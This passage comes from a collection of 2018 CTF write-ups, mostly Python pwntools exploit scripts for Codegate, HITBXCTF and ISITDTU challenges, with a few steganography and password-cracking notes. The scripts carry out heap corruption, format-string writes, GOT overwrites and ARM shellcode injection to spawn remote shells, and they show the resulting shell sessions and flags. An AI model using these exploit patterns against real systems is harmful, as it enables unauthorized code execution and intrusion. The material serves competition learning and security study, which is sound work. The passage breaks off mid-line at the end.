63 | strcmp_got = 0x603040 64 | puts_got = 0x603018 65 | exit_got = 0x603070 66 | malloc_got = 0x603050 67 | __libc_start_main_got = 0x603030 68 | r.recvuntil(">> ") 69 | Special("A"*0x10,"B"*0x20) 70 | Special("C"*0x10,"D"*0x20) 71 | Special("E"*0x10,"F"*0x20) 72 | Wait(0x48) 73 | payload = "A"*0x30 74 | payload += p64(strcmp_got) # time 75 | payload += p64(__libc_start_main_got) # name 76 | payload += p64(strcmp_got) # profile 77 | View(0, payload) 78 | res = View(1) 79 | print repr(res).replace("\\n","\n") 80 | __libc_start_main = u64(res.splitlines()[5][7:].ljust(8,"\x00")) 81 | log.info('__libc_start_main: %#x' % __libc_start_main) 82 | baselibc = __libc_start_main - offset__libc_start_main 83 | system = baselibc + offset_system 84 | log.info('baselibc: %#x' % baselibc) 85 | log.info('system: %#x' % system) 86 | payload = p64(system)[:-1] 87 | View(1, payload) 88 | raw_input("?") 89 | r.sendline("/bin/sh\x00") 90 | r.interactive() 91 | 92 | marimo(sys.argv[1]) 93 | # But_every_cat_is_more_cute_than_Marimo 94 | 95 | """ 96 | define ff 97 | echo ============== LIST:\n 98 | telescope 0x6030E0 15 99 | echo ============== COUNT:\n 100 | telescope 0x6030C0 1 101 | echo ============== MONEY:\n 102 | telescope 0x603158 1 103 | echo ============================\n 104 | end 105 | 106 | define fa 107 | x/40gx *0x6030E0-0x10 108 | end 109 | """ -------------------------------------------------------------------------------- /2018/Codegate CTF 2018 Preliminary/melong/melong: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/Codegate CTF 2018 Preliminary/melong/melong -------------------------------------------------------------------------------- /2018/Codegate CTF 2018 Preliminary/melong/melong.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | def melong(DEBUG="1"): 4 | def Checkbmi(height, weight): 5 | r.sendline("1") 6 | r.recvuntil("Your height(meters) : ") 7 | r.sendline(str(height)) 8 | r.recvuntil("Your weight(kilograms) : ") 9 | r.sendline(str(weight)) 10 | return r.recvuntil("Type the number:") 11 | 12 | def Exercise(): 13 | r.sendline("2") 14 | return r.recvuntil("Type the number:") 15 | 16 | def PT(howlong): 17 | r.sendline("3") 18 | r.recvuntil("How long do you want to take personal training?") 19 | r.sendline(str(howlong)) 20 | return r.recvuntil("Type the number:") 21 | 22 | def WriteDailyRecord(payload): 23 | r.sendline("4") 24 | r.send(payload) 25 | 26 | return r.recvuntil("Type the number:") 27 | 28 | 29 | if DEBUG=="1": 30 | r = process(["qemu-arm-static","-g","12345", "./melong"]) 31 | # target remote localhost:12345 32 | raw_input("Debug?") 33 | elif DEBUG=="2": 34 | r = process(["qemu-arm-static","./melong"]) 35 | raw_input("Debug?") 36 | elif DEBUG=="3": 37 | HOST = "ch41l3ng3s.codegate.kr" 38 | PORT = 1199 39 | r = remote(HOST,PORT) 40 | 41 | nop = "\x00\x00\xa0\xe1" 42 | main = 0x000110D4 43 | data = 0x23064 44 | shellcode = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x0e\x30\x01\x90\x49\x1a\x92\x1a\x08\x27\xc2\x51\x03\x37\x01\xdf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x00" 45 | r.recvuntil("Type the number:") 46 | Checkbmi(123, 123) 47 | Exercise() 48 | Checkbmi(123, 123) 49 | Exercise() 50 | PT(0) 51 | PT(80) 52 | PT(80) 53 | WriteDailyRecord("\xff"*0x50) 54 | res = WriteDailyRecord("\xff"*0x5C) 55 | stack = u32(res[10+0x5c:10+0x5c+4]) 56 | log.info('stack: %#x' % stack) 57 | payload = nop*10 58 | payload += shellcode 59 | payload += "\xff"*(0x50-len(payload)) 60 | payload += p32(stack) # fp 61 | payload += p32(stack-0x190) # pc 62 | WriteDailyRecord(payload) 63 | r.sendline("6") 64 | r.sendline("cat flag") 65 | r.interactive() 66 | 67 | melong(sys.argv[1]) 68 | 69 | """ 70 | $ python melong.py 3 71 | [+] Opening connection to ch41l3ng3s.codegate.kr on port 1199: Done 72 | [*] stack: 0xf6fffdf4 73 | [*] Switching to interactive mode 74 | See you again :) 75 | FLAG{D0n7_7h1nk_7ha7_1_Can_3xp1ain_it} 76 | $ 77 | """ -------------------------------------------------------------------------------- /2018/HITBXCTF/misc/pix/README.md: -------------------------------------------------------------------------------- 1 | ``` 2 | $ zsteg ./aee487a2-49cd-4f1f-ada6-b2d398342d99.SteinsGate 3 | imagedata .. text: " !#865 " 4 | b1,r,msb,xy .. text: "y5b@2~2t" 5 | b1,rgb,lsb,xy .. file: Keepass password database 2.x KDBX 6 | b2,r,msb,xy .. text: "\rP`I$X7D" 7 | b2,bgr,lsb,xy .. text: "b;d'8H~M" 8 | b4,g,msb,xy .. text: ";pTr73& dvG:" 9 | ``` 10 | ``` 11 | $ zsteg -E b1,rgb,lsb,xy ./aee487a2-49cd-4f1f-ada6-b2d398342d99.SteinsGate > keepass.kdbx 12 | ``` 13 | ``` 14 | $ file keepass.kdbx 15 | keepass.kdbx: Keepass password database 2.x KDBX 16 | ``` 17 | ``` 18 | pix and password 19 | weak password! 20 | lower casee letters and number 21 | len(password) == 10 22 | hitb + number 23 | Crack Master password by john the ripper, I found Master Password is hitb180408 24 | ``` 25 | ``` 26 | Open keepass.kdbx with KeePass 27 | Group: flag, Title: flag, User Name: myname, Password: ********, URL: http://keepass.info/, Creation Time: 4/8/2018 3:49:14 PM, Last Modification Time: 4/8/2018 3:50:45 PM 28 | 29 | HITB{p1x_aNd_k33pass} 30 | ``` -------------------------------------------------------------------------------- /2018/HITBXCTF/misc/pix/aee487a2-49cd-4f1f-ada6-b2d398342d99.SteinsGate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/HITBXCTF/misc/pix/aee487a2-49cd-4f1f-ada6-b2d398342d99.SteinsGate -------------------------------------------------------------------------------- /2018/HITBXCTF/misc/pix/keepass.kdbx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/HITBXCTF/misc/pix/keepass.kdbx -------------------------------------------------------------------------------- /2018/HITBXCTF/misc/tpyx/README.md: -------------------------------------------------------------------------------- 1 | ``` 2 | Fix IDAT chunk length + CRC: 3 | IDAT: 4 | Length: 1164470 5 | CRC: 6a0412ff 6 | ``` 7 | ``` 8 | $ zsteg ./e47c7307-b54c-4316-9894-5a8daec738b4.png 9 | extradata:imagedata .. file: zlib compressed data 10 | 00000000: 78 da 5d 50 89 6d 45 31 08 5b c9 dc 64 9c 04 5e |x.]P.mE1.[..d..^| 11 | 00000010: f6 1f a1 fc 43 aa 5a a4 28 60 c0 06 24 62 9f da |....C.Z.(`..$b..| 12 | 00000020: 97 83 0a 80 24 df e5 b5 48 f0 d7 e2 1f 20 85 87 |....$...H.... ..| 13 | 00000030: 55 b1 4a 79 dd 3e c8 2b f4 9c 62 71 3a 02 f2 0b |U.Jy.>.+..bq:...| 14 | 00000040: dd b1 36 02 29 10 d1 f2 ec d6 e8 23 29 8f 9e 60 |..6.)......#)..`| 15 | 00000050: f5 5d bb 33 d4 51 0d 9c ed 5c 77 3f 9e 86 a4 e4 |.].3.Q...\w?....| 16 | 00000060: ed cb 38 36 08 0a 1f 41 c2 7a 8f 10 38 e3 03 cc |..86...A.z..8...| 17 | 00000070: 83 5f 9a 98 b0 4d 10 75 62 df 33 0c 65 7b 64 9d |._...M.ub.3.e{d.| 18 | 00000080: 47 76 72 04 b3 7e 8f 4c df 57 5c 1c f3 27 86 bd |Gvr..~.L.W\..'..| 19 | 00000090: c4 ce 92 ef 72 06 22 1a 7e f8 28 fa dc c3 a7 de |....r.".~.(.....| 20 | 000000a0: e3 93 24 7e d5 bf bc 54 3d 57 6c 2e d6 c3 3f a7 |..$~...T=Wl...?.| 21 | 000000b0: fa e2 8f fb 7a d2 bd a9 47 99 f4 83 27 ee ad ee |....z...G...'...| 22 | 000000c0: e5 f2 c5 6d f6 79 e3 bf 46 13 88 1a 05 bb e8 35 |...m.y..F......5| 23 | 000000d0: f3 16 b7 70 0a e3 63 1e a6 6c 29 e9 c1 47 d7 b4 |...p..c..l)..G..| 24 | 000000e0: 87 b4 f4 0f c3 ab 68 44 |......hD | 25 | ``` 26 | ``` 27 | $ pigz -d -i ./tpyx.zz 28 | ``` 29 | ``` 30 | $ python -c 'data=open("tpyx","rb").read().decode("hex");open("tpyx2","wb").write(data)' 31 | ``` 32 | ``` 33 | $ cat tpyx2 | xxd 34 | 00000000: 377a bcaf 271c 0003 82f9 6c91 3000 0000 7z..'.....l.0... 35 | 00000010: 0000 0000 7300 0000 0000 0000 3c0e 2440 ....s.......<.$@ 36 | 00000020: 9c42 9fdb 08f3 1ebc 2361 b301 6f04 a79a .B......#a..o... 37 | 00000030: 0708 3033 4c68 dd47 db38 3e4b 7246 acad ..03Lh.G.8>KrF.. 38 | 00000040: 8746 0cd0 0ba6 2cfa e685 0818 2a69 527a .F....,.....*iRz 39 | 00000050: 0104 0600 0109 3000 070b 0100 0224 06f1 ......0......$.. 40 | 00000060: 0701 0a53 07cb 7afb faec 5aa0 7623 0301 ...S..z...Z.v#.. 41 | 00000070: 0105 5d00 0001 0001 000c 2c27 0008 0a01 ..].......,'.... 42 | 00000080: c35b 9330 0000 0501 110b 0066 006c 0061 .[.0.......f.l.a 43 | 00000090: 0067 0000 0012 0a01 0000 844b f357 1cd1 .g.........K.W.. 44 | 000000a0: 0113 0a01 0000 e669 e866 d1d3 0114 0a01 .......i.f...... 45 | 000000b0: 0080 ffcd d963 d1d3 0115 0601 0080 0000 .....c.......... 46 | 000000c0: 0000 0018 0034 5172 634f 556d 3657 6175 .....4QrcOUm6Wau 47 | 000000d0: 2b56 7542 5838 672b 4950 673d 3d +VuBX8g+IPg== 48 | 49 | ``` 50 | ``` 51 | $ 7z x tpyx2 52 | 7-Zip [64] 9.20 Copyright (c) 1999-2010 Igor Pavlov 2010-11-18 53 | p7zip Version 9.20 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,1 CPU) 54 | 55 | Processing archive: tpyx2 56 | 57 | 58 | Enter password (will not be echoed) :4QrcOUm6Wau+VuBX8g+IPg== 59 | Extracting flag 60 | 61 | Everything is Ok 62 | 63 | Size: 39 64 | Compressed: 221 65 | ``` 66 | 67 | ``` 68 | $ cat flag 69 | HITB{0c88d56694c2fb3bcc416e122c1072eb} 70 | ``` -------------------------------------------------------------------------------- /2018/HITBXCTF/misc/tpyx/e47c7307-b54c-4316-9894-5a8daec738b4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/HITBXCTF/misc/tpyx/e47c7307-b54c-4316-9894-5a8daec738b4.png -------------------------------------------------------------------------------- /2018/HITBXCTF/misc/tpyx/flag: -------------------------------------------------------------------------------- 1 | HITB{0c88d56694c2fb3bcc416e122c1072eb} 2 | -------------------------------------------------------------------------------- /2018/HITBXCTF/misc/tpyx/tpyx: -------------------------------------------------------------------------------- 1 | 377abcaf271c000382f96c91300000000000000073000000000000003c0e24409c429fdb08f31ebc2361b3016f04a79a070830334c68dd47db383e4b7246acad87460cd00ba62cfae68508182a69527a0104060001093000070b0100022406f107010a5307cb7afbfaec5aa07623030101055d0000010001000c2c2700080a01c35b933000000501110b0066006c00610067000000120a010000844bf3571cd101130a010000e669e866d1d301140a010080ffcdd963d1d301150601008000000000001800345172634f556d365761752b5675425838672b4950673d3d -------------------------------------------------------------------------------- /2018/HITBXCTF/misc/tpyx/tpyx2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/HITBXCTF/misc/tpyx/tpyx2 -------------------------------------------------------------------------------- /2018/HITBXCTF/misc/tpyx/tpyx2.zlib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/HITBXCTF/misc/tpyx/tpyx2.zlib -------------------------------------------------------------------------------- /2018/HITBXCTF/pwn/babypwn/babypwn.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from pwn import * 4 | import subprocess 5 | import sys 6 | import time 7 | 8 | HOST = "47.75.182.113" 9 | PORT = 9999 10 | 11 | context.arch = 'amd64' 12 | context.os = 'linux' 13 | context.endian = 'little' 14 | context.word_size = 32 15 | 16 | context.log_level = 'INFO' 17 | 18 | def leak(addr): 19 | payload = "%7$s.AAA"+p64(addr) 20 | r.sendline(payload) 21 | print "leaking:", hex(addr) 22 | resp = r.recvuntil(".AAA") 23 | ret = resp[:-4:] + "\x00" 24 | r.recvrepeat(0.2) 25 | return ret 26 | 27 | if __name__ == "__main__": 28 | r = remote(HOST, PORT) 29 | d = DynELF(leak, 0x40076d) 30 | dynamic_ptr = d.dynamic 31 | cnt = 0 32 | while True: 33 | addr = dynamic_ptr + 0x10*cnt 34 | ret = leak(addr) 35 | if ret == "\x03\x00": #TYPE PLTGOT 36 | addr += 8 37 | for i in xrange(8): 38 | ret = leak(addr+i) 39 | print "retX:", ret.encode('hex') 40 | break 41 | else: 42 | cnt += 1 43 | system_addr = d.lookup('system', 'libc') 44 | printf_addr = d.lookup('printf', 'libc') 45 | # [+] printf_addr: 0x7fb678d11800 46 | # [+] system_addr: 0x7fb678d01390 47 | log.success("printf_addr: "+hex(printf_addr)) 48 | log.success("system_addr: "+hex(system_addr)) 49 | 50 | offset_system = 0x10470 51 | # got = 0x601000 52 | # for i in xrange(0,0x10): 53 | # ret = leak(got+1+i*8) 54 | # print "ret2:", ret.encode('hex') 55 | 56 | printf_got = 0x601020 57 | printf_addr = u64(("\x00" + leak(printf_got+1)).ljust(8, "\x00")) 58 | system_addr = printf_addr - offset_system 59 | 60 | 61 | log.success("printf_addr: " + hex(printf_addr)) 62 | log.success("system_addr: " + hex(system_addr)) 63 | 64 | byte1 = system_addr & 0xff 65 | byte2 = (system_addr & 0xffff00) >> 8 66 | log.success("byte1: " + hex(byte1)) 67 | log.success("byte2: " + hex(byte2)) 68 | 69 | payload = "%" + str(byte1) + "u" + "%10$hhn." 70 | payload += "%" + str(byte2-byte1-1) + "u" + "%11$hn." 71 | payload = payload.ljust(32, "A") 72 | payload += p64(printf_got) + p64(printf_got+1) 73 | r.sendline(payload) 74 | r.sendline("sh\x00") 75 | r.interactive() 76 | 77 | """ 78 | http://bruce30262.logdown.com/posts/1255979-33c3-ctf-2016-espr 79 | 0.AAAAA \x10`$ ls 80 | babypwn 81 | bin 82 | dev 83 | flag 84 | lib 85 | lib32 86 | lib64 87 | $ cat flag 88 | HITB{Baby_Pwn_BabY_bl1nd} 89 | $ 90 | """ -------------------------------------------------------------------------------- /2018/HITBXCTF/pwn/d/d: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/HITBXCTF/pwn/d/d -------------------------------------------------------------------------------- /2018/HITBXCTF/pwn/d/d.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | from base64 import b64encode, b64decode 5 | 6 | def d(DEBUG): 7 | t = 0.5 8 | if DEBUG=="1": 9 | offset_libc_start_main = 0x20740 10 | offset_system = 0x45390 11 | offset_sh = 0x18cd57 12 | r = process("./d") 13 | raw_input("debug?") 14 | elif DEBUG=="2": 15 | offset_libc_start_main = 0x20740 16 | offset_system = 0x45390 17 | offset_sh = 0x18cd57 18 | t = 0.03 19 | HOST = '47.75.154.113' 20 | PORT = 9999 21 | r = remote(HOST,PORT) 22 | 23 | def Read(idx, msg): 24 | r.sendline("1") 25 | r.recvuntil("Which? :") 26 | r.sendline(str(idx)) 27 | r.recvuntil("msg:") 28 | if len(msg)==0x400: 29 | r.send(msg) 30 | time.sleep(t) 31 | else: 32 | r.sendline(msg) 33 | return r.recvuntil("Which? :") 34 | 35 | def Edit(idx, msg): 36 | r.sendline("2") 37 | r.recvuntil("Which? :") 38 | r.sendline(str(idx)) 39 | r.recvuntil("new msg:") 40 | if len(msg)==0x400: 41 | r.send(msg) 42 | time.sleep(t) 43 | else: 44 | r.sendline(msg) 45 | return r.recvuntil("Which? :") 46 | 47 | def Wipe(idx): 48 | r.sendline("3") 49 | r.recvuntil("Which? :") 50 | r.sendline(str(idx)) 51 | return r.recvuntil("Which? :") 52 | 53 | 54 | r.recvuntil("Which? :") 55 | addr = 0x60217d-0x10 56 | LIST_ADDR = 0x602180 57 | free_got = 0x602018 58 | printf_got = 0x602038 59 | strlen_got = 0x602028 60 | atoi_got = 0x602068 61 | atoi_plt = 0x400800 62 | libc_start_main_got = 0x602050 63 | puts_plt = 0x400770 64 | dl_resolve_got = 0x602010 65 | Read(0, b64encode("a"*0x20)) 66 | 67 | Read(1, b64encode("a"*0x20)) 68 | 69 | Read(2, b64encode("a"*0x60)) 70 | 71 | Read(3, b64encode("a"*0x60)) 72 | 73 | Wipe(0) 74 | 75 | Read(0, b64encode("\x60"*0x29)[:-1]) 76 | 77 | payload = "a"*0x28 78 | payload += p64(0x71) 79 | Edit(2, payload) 80 | Wipe(1) 81 | Wipe(2) 82 | 83 | Read(1, b64encode("a"*0x50)) 84 | 85 | payload = p64(0)*5 86 | payload += p64(0x71) 87 | payload += p64(addr) 88 | Edit(1, payload) 89 | 90 | Read(2, b64encode("a"*0x60)) 91 | 92 | payload = "a"*3 93 | payload += "A"*(0x50-len(payload)) 94 | 95 | Read(4, b64encode(payload)) 96 | 97 | payload = "0"*3 98 | payload += p64(LIST_ADDR) # 0 99 | payload += p64(free_got) # 1 100 | payload += p64(strlen_got) # 2 101 | payload += p64(atoi_got) # 3 102 | payload += p64(dl_resolve_got) # 4 103 | payload += p64(libc_start_main_got) # 5 104 | payload = payload.ljust(0x65,"\x00") 105 | Read(5, b64encode(payload)) 106 | 107 | payload = p64(puts_plt)[:5] 108 | Edit(1, payload) 109 | 110 | res = Wipe(5) 111 | libc_start_main = u64(res[:6].ljust(8,"\x00")) 112 | log.info("libc_start_main: %#x" % libc_start_main) 113 | baselibc = libc_start_main - offset_libc_start_main 114 | system = baselibc + offset_system 115 | sh = baselibc + offset_sh 116 | 117 | log.info("baselibc: %#x" % baselibc) 118 | log.info("system: %#x" % system) 119 | log.info("sh: %#x" % sh) 120 | 121 | payload = "/bin/sh\x00" 122 | Read(6, b64encode(payload)) 123 | 124 | Edit(4, p64(0x31313131)) # dl_resolve_got = "1111" 125 | 126 | payload = p64(atoi_plt) # strlen_got = atoi_plt 127 | Edit(2, payload) 128 | 129 | raw_input("?") 130 | msg = "A"*8 131 | msg += p64(system)[:-1] 132 | Edit(4, msg) 133 | 134 | r.sendline("3") # Wipe 135 | r.sendline("6") # idx sh 136 | # free(sh) => system(sh) 137 | r.interactive() 138 | 139 | d(sys.argv[1]) 140 | """ 141 | define ff 142 | telescope 0x602180 64 143 | x/40gx *0x602180-0x10 144 | fastbins 145 | end 146 | """ 147 | # HITB{b4se364_1s_th3_b3st_3nc0d1ng!} -------------------------------------------------------------------------------- /2018/HITBXCTF/pwn/once/libc-2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/HITBXCTF/pwn/once/libc-2.23.so -------------------------------------------------------------------------------- /2018/HITBXCTF/pwn/once/once: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/HITBXCTF/pwn/once/once -------------------------------------------------------------------------------- /2018/HITBXCTF/pwn/once/once.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | import sys 4 | 5 | def once(DEBUG): 6 | t = 0.5 7 | if DEBUG=="1": 8 | r = process("./once") 9 | raw_input("debug?") 10 | elif DEBUG=="2": 11 | r = process("./once", env={"LD_PRELOAD":"./libc-2.23.so"}) 12 | raw_input("debug?") 13 | elif DEBUG=="3": 14 | t = 0.03 15 | HOST = '47.75.189.102' 16 | PORT = 9999 17 | r = remote(HOST,PORT) 18 | 19 | def getPuts(): 20 | r.sendline() 21 | r.recvuntil("Invalid choice\n") 22 | return r.recvuntil(">")[:-1] 23 | 24 | def initList(): 25 | r.sendline("1") 26 | return r.recvuntil("> ") 27 | 28 | def readItem(payload): 29 | r.sendline("2"+"\x00"*6) 30 | r.send(payload) 31 | time.sleep(t) 32 | return r.recvuntil("> ") 33 | 34 | def unlink(): 35 | r.sendline("3") 36 | return r.recvuntil("> ") 37 | 38 | def malloc(size): 39 | r.sendline("4") 40 | r.recvuntil("> ") 41 | r.sendline("1") 42 | r.recvuntil("input size:\n") 43 | r.sendline(str(size)) 44 | return r.recvuntil("> ") 45 | 46 | def readPtr(payload): 47 | r.sendline("4") 48 | r.recvuntil("> ") 49 | r.sendline("2"+"\x00"*6) 50 | r.sendline(payload) 51 | return r.recvuntil("> ") 52 | 53 | def freePtr(): 54 | r.sendline("4") 55 | r.recvuntil("> ") 56 | r.sendline("3") 57 | return r.recvuntil("> ") 58 | 59 | offset_puts = 0x6f690 60 | offset_main_arena = 0x3c4b20 61 | offset_system = 0x45390 62 | offset_stdout = 0x3c5620 63 | offset_stdin = 0x3c48e0 64 | 65 | PTR = 0x555555756068 66 | CHECKFREE = 0x555555756070 67 | 68 | r.recvuntil("> ") 69 | res = getPuts() 70 | puts = int(res, 16) 71 | baselibc = puts - offset_puts 72 | main_arena = baselibc + offset_main_arena 73 | top_chunk = main_arena + 0x58 74 | system = baselibc + offset_system 75 | stdout = baselibc + offset_stdout 76 | stdin = baselibc + offset_stdin 77 | free_hook = main_arena + 0x1c88 78 | log.info('baselibc: %#x' % baselibc) 79 | log.info('main_arena: %#x' % main_arena) 80 | log.info('top_chunk: %#x' % top_chunk) 81 | log.info('puts: %#x' % puts) 82 | log.info("system: %#x" % system) 83 | log.info("stdout: %#x" % stdout) 84 | log.info("stdin: %#x" % stdin) 85 | 86 | payload = p64(0) 87 | payload += p64(0x2001) 88 | payload += p64(0) 89 | payload += p64(top_chunk - 0x10) 90 | readItem(payload) 91 | initList() 92 | unlink() 93 | 94 | malloc(300) 95 | 96 | payload = "/bin/sh\x00" 97 | payload += p64(free_hook) 98 | payload += p64(stdout) 99 | payload += p64(0) 100 | payload += p64(stdin) 101 | payload += p64(0) 102 | payload += p64(0) 103 | readItem(payload) 104 | 105 | payload = p64(system) 106 | readPtr(payload) 107 | 108 | r.sendline("4") 109 | r.recvuntil("> ") 110 | r.sendline("3") 111 | r.interactive() 112 | 113 | once(sys.argv[1]) 114 | """ 115 | $ python once.py 3 116 | [+] Opening connection to 47.75.189.102 on port 9999: Done 117 | [*] baselibc: 0x7f8778d74000 118 | [*] main_arena: 0x7f8779138b20 119 | [*] top_chunk: 0x7f8779138b78 120 | [*] puts: 0x7f8778de3690 121 | [*] system: 0x7f8778db9390 122 | [*] stdout: 0x7f8779139620 123 | [*] stdin: 0x7f87791388e0 124 | [*] Switching to interactive mode 125 | $ cat flag 126 | HITB{this_is_the_xxxxxxx_flag} 127 | $ 128 | """ -------------------------------------------------------------------------------- /2018/ISITDTU CTF 2018 Quals/babyformat/babyformat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phieulang1993/ctf-writeups/5bb6f55d4adab141a66455382522b5a0e73043a7/2018/ISITDTU CTF 2018 Quals/babyformat/babyformat -------------------------------------------------------------------------------- /2018/ISITDTU CTF 2018 Quals/babyformat/babyformat.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | 4 | def babyformat(DEBUG): 5 | if DEBUG=="1": 6 | # https://libc.blukat.me/?q=system%3A0x3ada0&l=libc6_2.23-0ubuntu10_i386 7 | offset___libc_start_main_ret = 0x18637 8 | offset_system = 0x3ada0 9 | offset_str_bin_sh = 0x15ba0b 10 | 11 | r = process('./babyformat') 12 | raw_input("debug?") 13 | elif DEBUG=="2": 14 | # https://libc.blukat.me/?q=__libc_start_main_ret%3Ae81&l=libc6-i386_2.27-3ubuntu1_amd64 15 | offset___libc_start_main_ret = 0x18e81 16 | offset_system = 0x0003cd10 17 | offset_str_bin_sh = 0x17b8cf 18 | 19 | HOST = '104.196.99.62' 20 | PORT = 2222 21 | r = remote(HOST,PORT) 22 | 23 | # make fmt more 24 | r.recvuntil("==== Baby Format - Echo system ====\n") 25 | payload = '%6$p%9$p%7$p' 26 | assert len(payload) <= 13 27 | r.send(payload) 28 | 29 | ebp = eval(r.recv(10)) 30 | addr = eval(r.recv(10)) 31 | back_addr = eval(r.recv(10))-0xe 32 | leak = ebp-0x1c 33 | offset = (addr-leak)/4+7 34 | 35 | log.info("ebp: %#x" %ebp) 36 | log.info("addr: %#x" %addr) 37 | log.info("back_addr: %#x" %back_addr) 38 | log.info("leak: %#x" %leak) 39 | log.info("offset: %#x" %offset) 40 | payload = "%"+str(leak&0xffff)+"c%9$hn" 41 | payload = payload.ljust(13, '\x00') 42 | assert len(payload) <= 13 43 | r.send(payload) 44 | r.recv(leak&0xffff) 45 | 46 | payload = "%"+str(back_addr&0xffff)+"c"+"%"+str(offset)+"$hn" 47 | payload = payload.ljust(13, '\x00') 48 | assert len(payload) <= 13 49 | r.send(payload) 50 | r.recv(back_addr&0xffff) 51 | 52 | payload = "%"+str((leak+0x13)&0xffff)+"c%10$hn" 53 | payload = payload.ljust(13, '\x00') 54 | assert len(payload) <= 13 55 | r.send(payload) 56 | r.recv((leak+0x13)&0xffff) 57 | 58 | payload = "%"+str(0xff)+"c"+"%"+str(offset+2)+"$hhn" 59 | payload = payload.ljust(13, '\x00') 60 | assert len(payload) <= 13 61 | r.send(payload) 62 | r.recv(0xff) 63 | 64 | # leak libc and control eip 65 | payload = '-->%15$p%13$p' 66 | payload = payload.ljust(13, '\x00') 67 | assert len(payload) <= 13 68 | r.send(payload) 69 | r.recvuntil('-->') 70 | _libc_start_main_ret = eval(r.recv(10)) 71 | log.info("_libc_start_main_ret: %#x" % _libc_start_main_ret) 72 | 73 | libc = _libc_start_main_ret - offset___libc_start_main_ret 74 | log.info("libc: %#x" %libc) 75 | system = libc + offset_system 76 | sh = libc + offset_str_bin_sh 77 | log.info("system: %#x" %system) 78 | log.info("sh: %#x" %sh) 79 | 80 | retaddr = eval(r.recv(10)) - 4 81 | log.info("retaddr %#x" %retaddr) 82 | 83 | # write system 84 | payload = "%"+str(retaddr&0xffff)+"c%9$hn" 85 | payload = payload.ljust(13, '\x00') 86 | assert len(payload) <= 13 87 | r.send(payload) 88 | r.recv(retaddr&0xffff) 89 | 90 | payload = "%"+str((retaddr+2)&0xffff)+"c%10$hn" 91 | payload = payload.ljust(13, '\x00') 92 | assert len(payload) <= 13 93 | r.send(payload) 94 | r.recv(retaddr&0xffff) 95 | 96 | payload = "%"+str(system&0xffff)+"c"+"%"+str(offset)+"$hn" 97 | payload = payload.ljust(13, '\x00') 98 | assert len(payload) <= 13 99 | r.send(payload) 100 | r.recv(system&0xffff) 101 | 102 | payload = "%"+str((system>>16)&0xffff)+"c"+"%"+str(offset+2)+"$hn" 103 | payload = payload.ljust(13, '\x00') 104 | assert len(payload) <= 13 105 | r.send(payload) 106 | r.recv((system>>16)&0xffff) 107 | 108 | 109 | #write sh 110 | payload = "%"+str((retaddr+8)&0xffff)+"c%9$hn" 111 | payload = payload.ljust(13, '\x00') 112 | assert len(payload) <= 13 113 | r.send(payload) 114 | r.recv(retaddr&0xffff) 115 | 116 | payload = "%"+str((retaddr+10)&0xffff)+"c%10$hn" 117 | payload = payload.ljust(13, '\x00') 118 | assert len(payload) <= 13 119 | r.send(payload) 120 | r.recv(retaddr&0xffff) 121 | 122 | payload = "%"+str(sh&0xffff)+"c"+"%"+str(offset)+"$hn" 123 | payload = payload.ljust(13, '\x00') 124 | assert len(payload) <= 13 125 | r.send(payload) 126 | r.recv(sh&0xffff) 127 | 128 | payload = "%"+str((sh>>16)&0xffff)+"c"+"%"+str(offset+2)+"$hn" 129 | payload = payload.ljust(13, '\x00') 130 | assert len(payload) <= 13 131 | r.send(payload) 132 | r.recv((sh>>16)&0xffff) 133 | 134 | payload = 'EXIT'.ljust(13, '\x00') 135 | r.send(payload) 136 | r.recvuntil('EXIT') 137 | r.interactive() 138 | 139 | babyformat(sys.argv[1]) -------------------------------------------------------------------------------- /2018/ISITDTU CTF 2018 Quals/encode/encode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from subprocess import Popen, PIPE 4 | import os 5 | 6 | def encode(): 7 | os.chdir("/var/www/html/") 8 | payload = 'A'*0x32+"\x70\x20\x02" 9 | filename = "encoded/file1.jpg"+payload 10 | """ 11 | # http://docs.pwntools.com/en/stable/shellcraft/arm.html 12 | from pwn import * 13 | context.arch = 'thumb' 14 | filename = "./flag" 15 | shellcode = asm(shellcraft.arm.to_thumb()) 16 | shellcode += asm(shellcraft.read(0, 'sp', 32)) 17 | shellcode += asm(shellcraft.arm.linux.cat(filename)) 18 | shellcode = shellcode.encode("hex") 19 | print shellcode 20 | """ 21 | 22 | shellcode = "01308fe213ff2fe1" # shellcraft.arm.to_thumb() 23 | shellcode +="80ea000069464ff020024ff0030741df" # shellcraft.read(0, 'sp', 32) 24 | shellcode +="46f26177c4f2001780b442f62e77c6f6664780b4684681ea010182ea02024ff0050700df01464ff0010082ea02026ff000434ff0bb0700df" # shellcraft.arm.linux.cat("./flag") 25 | 26 | shellcode = shellcode.decode("hex") 27 | key = "concavangmauxanhlacay" 28 | s = '' 29 | for i in range(len(shellcode)): 30 | s += 